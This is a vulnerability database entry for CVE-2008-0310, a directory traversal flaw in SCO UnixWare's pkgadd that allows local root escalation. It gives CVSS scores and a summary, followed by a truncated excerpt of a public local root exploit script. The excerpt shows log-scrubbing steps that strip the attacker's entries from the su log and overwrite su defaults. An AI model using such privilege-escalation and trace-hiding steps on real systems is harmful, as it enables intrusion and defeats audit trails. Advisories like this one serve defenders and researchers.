6.9
CVSSv2

CVE-2008-0310

Published: 07/04/2008 Updated: 29/09/2017
CVSS v2 Base Score: 6.9 | Impact Score: 10 | Exploitability Score: 3.4
VMScore: 695
Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Directory traversal vulnerability in pkgadd in SCO UnixWare 7.1.4 before p534589 allows local users to create or append to arbitrary files via ".." sequences in an unspecified environment variable, probably PKGINST.

Vulnerable Product Search on Vulmon Subscribe to Product

sco unixware 7.1.4

Exploits

#!/bin/ksh # # 04/2008: public release # SCO UnixWare < 714 p534589 # if [ `id -un` = 'root' ]; then grep -v " $1-root\$" /var/adm/sulog >sulog cp sudef /etc/default/su cp sulog /var/adm/sulog rm -f sudef sulog wootlog else echo "------------------------------------" echo " UnixWare pkgadd Local Root Exploit" echo " By qaaz" e ...